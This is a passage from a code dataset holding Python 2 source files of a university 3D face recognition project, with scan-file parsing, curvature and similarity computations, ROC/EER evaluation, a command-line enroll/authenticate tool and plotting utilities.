faces with a given \n set of methods and normalizers. For each method, a seperate thread will\n be spawned\n \"\"\"\n\n # Set default methods\n if not methods:\n methods = [distance_histogram_euclidean, distance_histogram_city_block, distance_histogram_correlation]\n\n # Set default normalizers\n if not normalizers:\n normalizers = [score_normalization_min_max, score_normalization_min_max, False]\n\n # Create output array\n output = numpy.zeros(shape=(len(methods), len(faces), len(faces)))\n output[:] = numpy.nan\n\n # Precalculations\n count_faces = len(faces)\n count_methods = len(methods)\n count_faces_limited = count_faces if not limit else limit\n threads = []\n\n # Iterate each face\n def _func(index, method, normalizer):\n # Create similarity matrix\n for i in range(count_faces_limited):\n if i % 25 == 0:\n print \"Method %d: %d/%d\" % (index, i, count_faces)\n\n for j in range(i, count_faces):\n output[(index, i, j)] = method(faces[i], faces[j])\n\n # Normalize matrix\n if normalizer: \n normalizer(output[index])\n\n # Print some info\n print \"Finished similarity matrix for method %d\" % index\n\n # Spawn the threads\n for i in range(count_methods):\n thread = threading.Thread(target=_func, args=(i, methods[i], normalizers[i]))\n thread.daemon = True\n threads.append(thread)\n thread.start()\n\n # Wait for all threads to complete\n for thread in threads: \n thread.join()\n\n # Done\n return output\n\ndef score_normalization_min_max(matrix):\n \"\"\" In place normalization to min-max scores \"\"\"\n\n # Calculate min/max\n dmin = numpy.nanmin(matrix)\n dmax = numpy.nanmax(matrix)\n\n # In-place transformation\n matrix -= dmin\n matrix /= (dmax - dmin)\n\n # Convert to score\n numpy.subtract(1, matrix, matrix)\n\ndef calculate_roc_eer(matrix, person_ids):\n \"\"\" Calculate the ROC curve and estimate the EER \"\"\"\n\n methods, _, _ = matrix.shape\n count = len(person_ids)\n result = [False, False, False]\n threads = []\n\n # Calculate ROC curve and EER for each method\n def _func(index):\n targets = []\n outputs = []\n\n for i in range(count):\n #if i % 25 == 0:\n #print \"Method %d: %d/%d\" % (index, i, count)\n\n for j in range(i, count):\n if person_ids[i] == person_ids[j]:\n targets.append(1)\n else:\n targets.append(0)\n\n outputs.append(matrix[index][i][j])\n\n # Calculate ROC curve\n tpr, fpr, _ = metrics.roc_curve(targets, outputs)\n\n # Create three function for solving\n f = interpolate.interp1d(tpr, fpr, bounds_error=False)\n g = lambda x: 1 - x\n \n # Estimate the EER -- the intersection of f(x) and g(x)\n for x in numpy.linspace(0, 1, 1000):\n # Skip boundaries as they are invalid for the interpolator\n if x == 0.0 or x == 1.0: \n continue\n\n # Check intersection point\n if f(x) >= g(x):\n eer = x\n break\n\n # Append data to result list\n result[index] = ((tpr, fpr), eer)\n\n # Print some info\n print \"Finished ROC and EER for method %d\" % index\n\n \n # Spawn the threads\n for i in range(methods):\n thread = threading.Thread(target=_func, args=(i,))\n thread.daemon = True\n threads.append(thread)\n thread.start()\n\n # Wait for all threads to complete\n for thread in threads: \n thread.join()\n \n # Done\n return result\n\ndef surfature(face):\n \"\"\" \n Calculate the surfatures of a given face. Based on a Matlab implementation\n http://stackoverflow.com/questions/11317579/surface-curvature-matlab-equivalent-in-python\n \"\"\"\n\n # First derivatives\n Xu, Xv = numpy.gradient(face.X)\n Yu, Yv = numpy.gradient(face.Y)\n Zu, Zv = numpy.gradient(face.Z)\n\n # Second derivates\n Xuu, Xuv = numpy.gradient(Xu)\n Yuu, Yuv = numpy.gradient(Yu)\n Zuu, Zuv = numpy.gradient(Zu)\n\n Xuv, Xvv = numpy.gradient(Xv)\n Yuv, Yvv = numpy.gradient(Yv)\n Zuv, Zvv = numpy.gradient(Zv)\n\n # Reshape to vector\n Xu = Xu.reshape(-1, 1)\n Yu = Yu.reshape(-1, 1)\n Zu = Zu.reshape(-1, 1)\n\n Xv = Xv.reshape(-1, 1)\n Yv = Yv.reshape(-1, 1)\n Zv = Zv.reshape(-1, 1)\n\n Xuu = Xuu.reshape(-1, 1)\n Yuu = Yuu.reshape(-1, 1)\n Zuu = Zuu.reshape(-1, 1)\n\n Xuv = Xuv.reshape(-1, 1)\n Yuv = Yuv.reshape(-1, 1)\n Zuv = Zuv.reshape(-1, 1)\n\n Xvv = Xvv.reshape(-1, 1)\n Yvv = Yvv.reshape(-1, 1)\n Zvv = Zvv.reshape(-1, 1)\n\n # Reshape data\n XYZu = numpy.concatenate((Xu, Yu, Zu), 1)\n XYZv = numpy.concatenate((Xv, Yv, Zv), 1)\n XYZuu = numpy.concatenate((Xuu, Yuu, Zuu), 1)\n XYZuv = numpy.concatenate((Xuv, Yuv, Zuv), 1)\n XYZvv = numpy.concatenate((Xvv, Yvv, Zvv), 1)\n\n # First fundamental coefficients\n E = numpy.sum(XYZu * XYZu, 1)\n F = numpy.sum(XYZu * XYZv, 1)\n G = numpy.sum(XYZv * XYZv, 1)\n \n m = numpy.cross(XYZu, XYZv)\n p = numpy.sqrt(numpy.sum(m * m, 1))\n n = numpy.divide(m, numpy.array([p, p, p]).T)\n\n # Second fundamental coefficients\n L = numpy.sum(XYZuu * n, 1)\n M = numpy.sum(XYZuv * n, 1)\n N = numpy.sum(XYZvv * n, 1)\n\n # Retrieve size\n s, t = face.Z.shape\n\n # Gaussian curvature\n K1 = numpy.multiply(L, N) - numpy.power(M, 2)\n K2 = numpy.multiply(E, G) - numpy.power(F, 2)\n K = numpy.divide(K1, K2).reshape(s, t)\n\n # Mean curvature\n H1 = numpy.multiply(E, N) + numpy.multiply(G, L) - numpy.multiply(numpy.multiply(2, F), M)\n H2 = numpy.multiply(2, numpy.multiply(E, G) - numpy.power(F, 2))\n H = numpy.divide(H1, H2).reshape(s, t)\n\n # Determine min and max curvatures\n Pmax = H + numpy.sqrt(numpy.power(H, 2) - K)\n Pmin = H - numpy.sqrt(numpy.power(H, 2) - K)\n\n # Done\n return K, H, Pmax, Pmin"
},
{
"alpha_fraction": 0.4914458096027374,
"alphanum_fraction": 0.49849045276641846,
"avg_line_length": 32.505619049072266,
"blob_id": "da4207ece0249bfd1e96e95294551be79b3f645b",
"content_id": "da79907d7078766b1035073bc32e61a814b26159",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2981,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 89,
"path": "/face3d/absfile.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nimport os\nimport numpy\n\nclass AbsFile(object):\n # Class variables\n invalid_value = -999999\n\n def __init__(self, filename):\n # Check if file exists\n if not os.path.exists(filename):\n raise Exception(\"Data file does not exist\")\n\n # Create variables\n self.data = {}\n self.row_size = False\n self.col_size = False\n\n # Now read the file and create an XYZ matrix\n with open(filename, 'r') as file_handle:\n # Helper for dimension\n def read_dimension(dimension):\n line = file_handle.readline()\n data = line.strip().split(\" \")\n\n if len(data) == 2 and data[1] == dimension:\n return int(data[0])\n else:\n raise Exception(\"Invalid header: expected '%s'\" % dimension)\n\n # Helper for data order\n def read_data_type():\n line = file_handle.readline()\n data = line.strip().split(\" \", 1)\n\n if len(data) == 2 and data[0] == \"pixels\":\n return data[1][1:-2].split(\" \")\n else:\n raise Exception(\"Invalid header: expected data type\")\n\n # Helper for reading data lines\n def read_data(data_type):\n # Initialize result array\n data_type = numpy.int if data_type == 'flag' else numpy.float\n result = numpy.zeros(self.col_size * self.row_size, dtype=data_type)\n index = 0\n\n # Read line\n line = file_handle.readline()\n data = line.strip().split(\" \")\n\n for value in data:\n try:\n if value != '':\n # Convert string to correct format\n result[index] = data_type(value)\n\n # Increment index\n index = index + 1\n except ValueError:\n print \"Unexpected input: expected '%s', got '%s'\" % (data_type, value)\n\n # In case of invalid values, mask invalid values\n if data_type == numpy.float:\n result[result == AbsFile.invalid_value] = numpy.nan\n\n # Return reshaped array\n return result.reshape(self.row_size, self.col_size)\n\n # Read the header of the file\n self.row_size = read_dimension('rows')\n self.col_size = read_dimension('columns')\n self.data_type = read_data_type()\n\n # Read the actual data\n for current_data_type in self.data_type:\n self.data[current_data_type] = read_data(current_data_type)\n\n @property\n def width(self):\n return self.col_size\n\n @property\n def height(self):\n return self.row_size"
},
{
"alpha_fraction": 0.5873394012451172,
"alphanum_fraction": 0.5917637944221497,
"avg_line_length": 30.850948333740234,
"blob_id": "a40f514e730f1b3340a4d09751fc473664ed437e",
"content_id": "4d6c282b4cd685339ddf137940c891ba2e7e1906",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11753,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 369,
"path": "/Face3D.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nfrom face3d import AbsFile, Face, Database\nfrom face3d import utils, algorithms\n\nimport argparse\nimport glob\nimport os\nimport sys\nimport numpy\nimport threading\n\nparameters = {\"N\": 67, \"K\": 12}\nparameter_types = {\"N\": int, \"K\": int}\ndatabase = None\ndebug = False\n\ndef Run(arguments):\n global database, parameters\n success = False\n result = False\n\n # Initialize a database\n database = Database(arguments.database)\n\n # Enrollment\n if arguments.enroll:\n success = True\n is_directory, path = arguments.enroll\n\n if is_directory:\n mask = \"%s/*.abs\"\n if arguments.mask:\n mask = \"%s/*\"+arguments.mask+\"*.abs\"\n files = glob.glob(mask % path)\n thread_count = 16\n chunks = [files[i::thread_count] for i in range(thread_count)]\n threads = []\n\n # Process each thread\n for chunk in chunks:\n thread = threading.Thread(\n target=lambda x: [enroll_face(c, arguments.person_id, arguments.auto_id) for c in x], args=(chunk,))\n thread.daemon = True\n threads.append(thread)\n thread.start()\n\n # Wait for the threads to finish\n for thread in threads:\n thread.join()\n\n else:\n enroll_face(path.name, arguments.person_id, arguments.auto_id)\n\n # Caches for\n faces = False\n matrix = False\n rocs = False\n\n if arguments.copy_to_database and arguments.mask:\n database2 = Database(arguments.copy_to_database)\n faces_to_copy = [f for f in list(database.iterator()) if arguments.mask in f[0]];\n for file_name, person_id, face in faces_to_copy:\n if database.exists(file_name):\n print \"File '%s' already exists\" % file_name\n continue\n database2.save(file_name, person_id, face)\n\n # Authenticating\n if arguments.authenticate:\n print \"Authenticating face from '%s'\" % arguments.authenticate\n success = True\n\n # Create face from file\n face = Face(AbsFile(arguments.authenticate))\n\n # Normalize it\n algorithms.process(face, parameters[\"N\"], parameters[\"K\"])\n\n # Get the other data\n if not faces:\n faces = list(database.iterator())\n matrix = algorithms.similarity_matrix([face] + [face[2] for face in faces], limit=1) # One line matrix\n\n # Evaluate result\n methods, _, _ = matrix.shape\n tresholds = [0.00, 0.00, 0.00]\n result = 3*[None]\n\n for i in range(methods):\n # Select indexes of candidates\n vector = numpy.array(matrix[i][0][1:])\n candidates, = numpy.where(vector >= tresholds[i])\n persons = {}\n\n # Verify candidates\n if len(candidates) == 0:\n #print \"Method %d does not yield any candidates!\" % i\n continue\n\n # Print method\n #print \"Results for method %d:\" % i\n\n # Print each candidate\n for candidate in candidates:\n\n filename, person_id, data = faces[candidate]\n\n # Add person to list of persons\n if person_id not in persons:\n persons[person_id] = []\n\n persons[person_id].append(matrix[i][0][candidate + 1])\n\n result[i] = [(person, [\"%.2f\" % s for s in scores]) for person, scores in persons.iteritems()]\n # Print results\n # for person, scores in persons.iteritems():\n # print \"Match with person %s with scores %s\" % (person, [\"%.2f\" % s for s in scores])\n\n # Reevaluation\n if arguments.reevaluate:\n print \"Reevaluate faces\"\n success = True\n\n # Get data\n if not faces: faces = list(database.iterator())\n\n # Action\n [algorithms.features_histogram(face[2], parameters[\"N\"], parameters[\"K\"]) for face in faces]\n\n # Visualizing\n if arguments.depth_map:\n print \"Generating depth map\"\n success = True\n\n # Get data\n if not faces: faces = list(database.iterator())\n\n # Action\n utils.generate_depth_map(faces, arguments.depth_map, arguments.draw_key_points)\n\n if arguments.feature_map:\n print \"Generating feature map\"\n success = True\n\n # Get data\n if not faces: faces = list(database.iterator())\n\n # Action\n utils.generate_feature_map(faces, arguments.feature_map)\n\n if arguments.similarity_matrix:\n print \"Generating similarity matrix\"\n success = True\n\n # Get data\n if not faces: faces = list(database.iterator())\n if not matrix: matrix = algorithms.similarity_matrix([face[2] for face in faces])\n\n # Action\n utils.generate_similarity_matrix(matrix, faces, arguments.similarity_matrix)\n\n if arguments.roc_curve:\n print \"Generating ROC curve\"\n success = True\n\n # Get data\n if not faces: faces = [f for f in list(database.iterator()) if f ]\n if not matrix: matrix = algorithms.similarity_matrix([face[2] for face in faces])\n if not rocs: rocs = algorithms.calculate_roc_eer(matrix, [face[1] for face in faces])\n\n utils.generate_roc_curve(rocs, arguments.roc_curve)\n\n return success, result\n\n\ndef RunByParams(authenticate=None,\n enroll=None,\n person_id=None,\n auto_id=False,\n reevaluate=False,\n depth_map=None,\n feature_map=None,\n similarity_matrix=None,\n roc_curve=None,\n draw_key_points=False,\n copy_to_database = None,\n mask = None,\n database='database.db',\n parametes='K=12,N=67'):\n\n argument = type(\"\", (), {})()\n argument.database = database\n argument.copy_to_database = copy_to_database\n argument.mask = mask\n argument.parameters = parametes\n argument.authenticate = None\n if authenticate is not None and os.path.exists(authenticate) and not os.path.isdir(authenticate):\n argument.authenticate = authenticate\n\n path = os.path.realpath(enroll)\n argument.enroll = None\n # Then check path\n if enroll is not None and os.path.exists(enroll):\n if os.path.isdir(path):\n argument.enroll = (True, path)\n else:\n argument.enroll = (False, open(path, \"rb\"))\n\n argument.person_id = person_id\n argument.auto_id = auto_id\n argument.reevaluate = reevaluate\n\n argument.depth_map = depth_map\n argument.feature_map = feature_map\n argument.similarity_matrix = similarity_matrix\n argument.roc_curve = roc_curve\n argument.draw_key_points = draw_key_points\n\n return Run(argument)\n\ndef RunByCmd():\n global database, parameters\n\n # Parse arguments\n arguments, parser = argument_parser()\n\n # Parse parameters\n try:\n for parameter in arguments.parameters.split(','):\n key, value = parameter.split('=', 1)\n parameters[key] = value\n except:\n print \"Invalid parameters: %s\" % arguments.parameters\n sys.exit(1)\n\n # Make sure parameters are of right type\n for key, value in parameters.iteritems():\n try:\n parameters[key] = parameter_types[key](value)\n except:\n print \"Parameter '%s' of incorrect type\" % key\n sys.exit(1)\n\n (success, result) = Run(arguments)\n\n if not success:\n parser.print_help()\n sys.exit(1)\n else:\n if result:\n for i, res in enumerate(result):\n print \"Mathod %d\" % (i)\n for p, s in res:\n print \"Match with person %s with scores %s\" % (p, s)\n\n sys.exit(0)\n\n\ndef enroll_face(file, person_id=None, auto_id=False, force=False):\n\n try:\n filename = os.path.basename(file)\n \n # Check for duplicates\n if database.exists(file) and not force:\n print \"File '%s' already enrolled\" % filename\n return\n\n # Make sure we have an identifier\n if not person_id and not auto_id:\n print \"Auto person identification disabled and no identification specified.\"\n return\n\n # File not yet enrolled\n print \"Processing %s\" % filename\n\n # Read data file\n absfile = AbsFile(file)\n\n # Derrive filename\n if auto_id:\n basename = os.path.basename(file)\n person_id = basename[:basename.index('d')]\n\n # Create Face object\n face = Face(absfile)\n\n # Apply algorithms to process raw data\n\n # Apply selected algorithms\n algorithms.process(face, parameters[\"N\"], parameters[\"K\"])\n\n # Compress data\n face.compress()\n except:\n print \"File '%s' failed\" % file\n \n # In debug mode, show exceptions\n if debug:\n raise\n else:\n return\n\n # Enroll to database\n database.save(file, person_id, face)\n\ndef argument_parser():\n # Helper for argparse to match file and/or directory\n def helper_file_or_directory(parser):\n def _inner(path):\n # First, resolve\n path = os.path.realpath(path)\n\n # Then check path\n if not os.path.exists(path):\n parser.error(\"The file or directory '%s' does not exist\" % path)\n else:\n if os.path.isdir(path):\n return (True, path)\n else:\n return (False, open(path, \"rb\"))\n return _inner\n\n # Helper for argparse to match file\n def helper_file(parser):\n def _inner(file):\n # First, resolve\n path = os.path.realpath(file)\n\n # Then check path\n if not os.path.exists(file) or os.path.isdir(file):\n parser.error(\"The file '%s' does not exist\" % path)\n\n # Done\n return file\n return _inner\n\n # Create parser\n parser = argparse.ArgumentParser(description='Enroll, match and visualize 3D faces')\n\n # Add the arguments\n parser.add_argument('-d', '--database', default='database.db', help='path to cache file')\n parser.add_argument('-p', '--parameters', default='K=12,N=67', action='store', help='algorithm parameters, comma seperated')\n\n group = parser.add_argument_group(title=\"Face management\")\n group.add_argument('--authenticate', type=helper_file(parser), help='authenticate a face to enrolled faces')\n group.add_argument('--enroll', type=helper_file_or_directory(parser), help='enroll face from file or directory')\n group.add_argument('--person-id', action='store', help='number or name identifing person')\n group.add_argument('--auto-id', action='store_true', help='derrive person identifier from filename')\n group.add_argument('--reevaluate', action='store_true', help='reevaluation enrolled faces, but do not save')\n\n group = parser.add_argument_group(title=\"Visualization\")\n group.add_argument('--depth-map', action='store', help='generate a depth map of enrolled faces')\n group.add_argument('--feature-map', action='store', help='generate a feature map of enrolled faces')\n group.add_argument('--similarity-matrix', action='store', help='generate a similarity matrix of all implemented methods')\n group.add_argument('--roc-curve', action='store', help='generate a ROC curve of all implemented methods')\n group.add_argument('--draw-key-points', action='store_true', help='include key points on depth map')\n\n # Done\n return parser.parse_args(), parser\n\n\n# Application main\nif __name__ == '__main__':\n RunByCmd()\n"
},
{
"alpha_fraction": 0.5901366472244263,
"alphanum_fraction": 0.6142054796218872,
"avg_line_length": 30.544857025146484,
"blob_id": "7d2320ce4e693499c95bae6fb9f2cb5df8383e71",
"content_id": "11685c87c0f4c833c7f3bb8c368e32b2d3e34b51",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14417,
"license_type": "permissive",
"max_line_length": 240,
"num_lines": 457,
"path": "/face3d/utils.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nfrom matplotlib import pyplot\nfrom scipy import signal\n\nimport numpy\nimport scipy\nimport math\nimport os\n\ndef max_xy(input, offset_x=0, offset_y=0):\n index = numpy.nanargmax(input)\n y, x = numpy.unravel_index(index, input.shape)\n return x + offset_x, y + offset_y\n\ndef min_xy(input, offset_x=0, offset_y=0):\n index = numpy.nanargmin(input)\n y, x = numpy.unravel_index(index, input.shape)\n return x + offset_x, y + offset_y\n\ndef find_peak_start(input, treshold=0.001, peak_length=15):\n input = numpy.abs(numpy.gradient(signal.bspline(input, 25)))\n\n # Control parameters\n input_treshold = numpy.nanmax(input) * treshold\n input_length = input.shape[0]\n recording = False\n start_x = 0\n stop_x = 0\n\n # Walk from start to end. When the current value exceeds threshold,\n # start recording.\n for i in range(0, input_length):\n if recording:\n if input[i] > treshold:\n stop_x = i\n\n if (stop_x - start_x) > peak_length:\n return start_x\n else:\n recording = False\n else:\n if input[i] > treshold:\n start_x = i\n recording = True\n\n # Nothing found\n return 0\n\ndef find_peak_stop(input, *args):\n # Apply the start search but reverse array\n x = find_peak_start(input[::1], *args)\n\n # Reverse result\n return input.shape[0] - x\n\ndef face(index=0, fit=True, N=67, K=12, interpolation=True):\n from absfile import AbsFile\n from face import Face\n import algorithms\n\n file = ['test_16/04371d164.abs', 'test_same/04203d350.abs', 'test_same/04203d352.abs', 'test_same/04203d354.abs', 'test_8/04316d216.abs', 'test_4/04374d193.abs'][index]\n face = Face(AbsFile(file))\n \n if interpolation:\n algorithms.repair(face)\n\n algorithms.smooth(face)\n algorithms.crop(face)\n algorithms.zoom(face)\n algorithms.key_points(face)\n algorithms.rotate(face)\n\n if fit:\n algorithms.key_points(face)\n algorithms.fit(face)\n\n # Extract features\n algorithms.features_histogram(face, N, K)\n\n return face\n\ndef evaluate_interpolation(output_file='interpolate.pdf'):\n f = face(5, interpolation=False)\n g = face(5)\n figure = pyplot.figure()\n\n subplot = pyplot.subplot(1, 2, 1)\n subplot.imshow(f.Z)\n\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n subplot = pyplot.subplot(1, 2, 2)\n subplot.imshow(g.Z)\n\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\ndef evaluate_features(output_file='features.pdf'):\n import algorithms\n blue = (0.0, 0.0, 1.0, 1.0)\n g = face(1, True, 18, 12)\n h = face(2, True, 18, 12)\n f = face(3, True, 18, 12)\n k = face(0, True, 18, 12)\n\n figure = pyplot.figure()\n\n subplot = pyplot.subplot(1, 5, 1)\n\n subplot.imshow(g.Z)\n\n for xx in range(1, 8):\n v = int((xx) * (g.height / 8))\n subplot.axhline(v, color=blue)\n\n subplot.set_xlabel('Different regions (N=8)')\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n subplot = pyplot.subplot(1, 5, 2)\n subplot.imshow(g.features[1].reshape(g.features[2]))\n subplot.set_xlabel('Person 1a')\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n subplot = pyplot.subplot(1, 5, 3)\n subplot.imshow(h.features[1].reshape(h.features[2]))\n subplot.set_xlabel('Person 1b')\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n subplot = pyplot.subplot(1, 5, 4)\n subplot.imshow(f.features[1].reshape(f.features[2]))\n subplot.set_xlabel('Person 1c')\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n subplot = pyplot.subplot(1, 5, 5)\n subplot.imshow(k.features[1].reshape(k.features[2]))\n subplot.set_xlabel('Person 2a') \n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False) \n\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\ndef evaluate_feature_extraction(output_file='face.pdf', output2_file='surfature.pdf', output3_file='mouth.pdf'):\n import algorithms\n f = face(4, fit=False)\n g = face(4)\n h = face(1)\n grey = (0.7, 0.7, 0.7, 0.7)\n K, H, Pmax, Pmin = algorithms.surfature(f)\n\n ########\n\n figure = pyplot.figure()\n\n subplot = pyplot.subplot(1, 1, 1)\n subplot.imshow(h.abs_file.data['Z'])\n\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n figure.savefig(\"raw.pdf\", format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\n ########\n\n figure = pyplot.figure()\n\n subplot = pyplot.subplot(1, 1, 1)\n subplot.imshow(f.Z)\n\n for name, point in f.key_points.iteritems():\n x, y = point\n subplot.plot(x, y, 'x', color='k') \n\n nose_x, nose_y = f.key_points['nose']\n lip_x, lip_y = f.key_points['lip']\n chin_x, chin_y = f.key_points['chin']\n\n nose_left_x, nose_left_y = f.key_points['nose_left']\n nose_right_x, nose_right_y = f.key_points['nose_right']\n lip_left_x, lip_left_y = f.key_points['lip_left']\n lip_right_x, lip_right_y = f.key_points['lip_right']\n\n border_lip_left_x, border_lip_left_y = f.key_points['border_lip_left']\n border_lip_right_x, border_lip_right_y = f.key_points['border_lip_right']\n\n pyplot.plot([nose_left_x, nose_right_x], [nose_left_y, nose_right_y], color=\"K\")\n pyplot.plot([lip_left_x, lip_right_x], [lip_left_y, lip_right_y], color=\"K\")\n\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\n ########\n\n figure = pyplot.figure()\n\n subplot = pyplot.subplot(1, 1, 1)\n subplot.imshow(g.Z)\n\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n figure.savefig(\"face2.pdf\", format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\n ########\n\n figure = pyplot.figure(figsize=(10, 5))\n\n subplot = pyplot.subplot(1, 1, 1)\n #subplot.plot(K[:, nose_x])\n a, = subplot.plot(H[:, nose_x] * 2)\n #subplot.plot(Pmin[:, nose_x])\n b, = subplot.plot(Pmax[:, nose_x])\n c, = subplot.plot(f.Z[:, nose_x] / 50)\n\n subplot.set_xlabel('Vertical Face Position')\n subplot.set_ylabel('Value')\n subplot.axvline(nose_y, color=grey)\n subplot.axvline(lip_y, color=grey)\n subplot.axvline(chin_y, color=grey)\n subplot.legend([a, b, c], [\"Mean\", \"Pmax\", \"Original\"])\n\n figure.show()\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\n ##########\n figure = pyplot.figure(figsize=(10, 5))\n\n subplot = pyplot.subplot(1, 2, 1)\n\n #a, = subplot.plot(Pmax[(lip_y - 5):(lip_y + 5), :])\n a, = subplot.plot(H[lip_y, :])\n b, = subplot.plot(Pmax[lip_y, :] * 2)\n c, = subplot.plot(f.Z[lip_y, :] / 20)\n\n subplot.set_xlabel('Horizontal Face Position')\n subplot.set_ylabel('Value')\n subplot.axvline(lip_right_x, color=grey)\n subplot.axvline(lip_left_x, color=grey)\n subplot.axvline(border_lip_left_x, color=grey)\n subplot.axvline(border_lip_right_x, color=grey)\n subplot.legend([a, b, c], [\"Mean\", \"Pmax\", \"Original\"])\n\n subplot = pyplot.subplot(1, 2, 2)\n\n a, = subplot.plot(numpy.nansum(H[(lip_y - 5):(lip_y + 5), :], axis=0))\n b, = subplot.plot(numpy.nansum(Pmax[(lip_y - 5):(lip_y + 5), :], axis=0) * 2)\n c, = subplot.plot(numpy.nansum(f.Z[(lip_y - 5):(lip_y + 5), :], axis=0) / 100)\n\n subplot.set_xlabel('Horizontal Face Position (summed)')\n subplot.set_ylabel('Value')\n subplot.axvline(lip_right_x, color=grey)\n subplot.axvline(lip_left_x, color=grey)\n subplot.axvline(border_lip_left_x, color=grey)\n subplot.axvline(border_lip_right_x, color=grey)\n subplot.legend([a, b, c], [\"Mean\", \"Pmax\", \"Original\"])\n\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\n\ndef evaluate_rotate(rotations=[-5.0, -2.5, -1.0, 1, 2.5, 5.0], index=4, output_file='rotations.pdf'):\n from scipy.ndimage import interpolation\n import algorithms\n\n original = face(index)\n other = face(1)\n faces = []\n\n for rotation in rotations:\n f = face(index)\n\n f.abs_file.data['X'] = interpolation.rotate(f.abs_file.data['X'], rotation, mode='nearest', prefilter=False, reshape=False)\n f.abs_file.data['Y'] = interpolation.rotate(f.abs_file.data['Y'], rotation, mode='nearest', prefilter=False, reshape=False)\n f.abs_file.data['Z'] = interpolation.rotate(f.abs_file.data['Z'], rotation, mode='nearest', prefilter=False, reshape=False)\n\n algorithms.features_histogram(f)\n faces.append(f)\n\n pyplot.figure()\n\n subplot = pyplot.subplot(1, 2+len(rotations), 1)\n\n subplot.imshow(original.Z)\n subplot.title.set_text(\"Original\")\n subplot.title.set_fontsize(10)\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n for rotation, f, i in zip(rotations, faces, range(len(rotations))):\n subplot = pyplot.subplot(1, 2+len(rotations), 2 + i)\n subplot.imshow(f.Z)\n subplot.title.set_text(\"%.1f deg\" % rotation)\n subplot.title.set_fontsize(10)\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n subplot = pyplot.subplot(1, 2+len(rotations), len(rotations) + 2)\n subplot.imshow(other.Z)\n subplot.title.set_text(\"Other\")\n subplot.title.set_fontsize(10)\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n pyplot.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\n return algorithms.similarity_matrix([original] + faces + [other], methods=[algorithms.distance_histogram_euclidean, algorithms.distance_histogram_city_block, algorithms.distance_histogram_correlation], normalizers=[False, False, False])\n\ndef chunks(l, n):\n for i in xrange(0, len(l), n):\n yield l[i:i+n]\n\ndef raw_moment(data, iord, jord):\n nrows, ncols = data.shape\n y, x = numpy.mgrid[:nrows, :ncols]\n data = data * x**iord * y**jord\n\n return data.sum()\n\ndef intertial_axis(data):\n \"\"\"Calculate the x-mean, y-mean, and cov matrix of an image.\"\"\"\n\n data_sum = data.sum()\n m10 = raw_moment(data, 1, 0)\n m01 = raw_moment(data, 0, 1)\n x_bar = m10 / data_sum\n y_bar = m01 / data_sum\n u11 = (raw_moment(data, 1, 1) - x_bar * m01) / data_sum\n u20 = (raw_moment(data, 2, 0) - x_bar * m10) / data_sum\n u02 = (raw_moment(data, 0, 2) - y_bar * m01) / data_sum\n cov = numpy.array([[u20, u11], [u11, u02]])\n\n return x_bar, y_bar, cov\n\ndef generate_base_map(faces, func, output_file):\n # Make sure there is data\n if not faces or len(faces) == 0:\n print \"Nothing to do\"\n return\n\n # Calculate rows and columns\n columns = math.ceil(math.sqrt(len(faces)))\n rows = ((len(faces) - 1) / columns) + 1;\n figure = pyplot.figure()\n figure.subplots_adjust(top=0.85)\n index = 1\n\n for (file, person_id, face) in faces:\n # Advance to next plot\n subplot = figure.add_subplot(columns, rows, index, xticks=[], yticks=[])\n index = index + 1\n\n # Plot face\n func(subplot, file, person_id, face, index)\n subplot.title.set_text(person_id)\n subplot.title.set_fontsize(10)\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n # Save figure\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\ndef generate_feature_map(faces, output_file):\n def _func(subplot, file, person_id, face, index):\n subplot.imshow(face.features[1].reshape(face.features[2]))\n\n generate_base_map(faces, _func, output_file)\n\ndef generate_depth_map(faces, output_file, key_points=False):\n def _func(subplot, file, person_id, face, index):\n subplot.imshow(face.Z)\n\n if key_points == True:\n for name, point in face.key_points.iteritems():\n x, y = point\n subplot.plot(x, y, 'x', color='k')\n\n generate_base_map(faces, _func, output_file)\n\ndef generate_similarity_matrix(matrix, faces, 